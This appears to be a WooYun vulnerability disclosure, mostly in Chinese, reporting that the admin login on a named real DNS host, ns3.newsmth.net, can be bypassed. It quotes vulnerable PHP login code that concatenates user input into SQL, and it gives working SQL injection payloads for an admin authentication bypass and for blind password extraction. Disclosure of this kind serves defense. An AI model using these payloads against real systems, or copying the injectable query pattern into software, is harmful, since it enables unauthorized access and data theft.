WooYun.org

ns3.newsmth.net可绕过，以administrator身份登陆，管理dns zone等。

漏洞：http://www.exploit-db.com/exploits/14884/

# Buggy code:

#

if(isset($_POST['username']) && isset($_POST['password'])) {

if((!filter("alphanum", $_POST['username'])) or (!filter("alphanum", $_POST['password']))) {

die("Username and password must contain only letters and numbers.");

}

$_SESSION['username'] = $_POST['username'];

$_SESSION['password'] = $_POST['password'];

}



if(isset($_SESSION['username']) && isset($_SESSION['password'])) {

$res = $dbconnect->query("SELECT ID FROM users WHERE username = '" . $_SESSION['username'] ."' AND password = '" . md5($_SESSION['password']) . " ' ");

#

##############################################################################################

#

# Easy admin login

#

# Enter in username field: admin'; #

# Enter in password field: [anything]

#

# Sql query will result like this: SELECT ID FROM users WHERE username = 'admin'; #' AND password = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'

#

##############################################################################################

#

# Limitation and Blind Sql Injection

#

# You're able to make blind sql injection too. Just input in username field something like this:

# admin' AND SUBSTRING(password,1,1)=char(49); #

#

# That sql injection work only with magic_quote_gpc = Off

#

##############################################################################################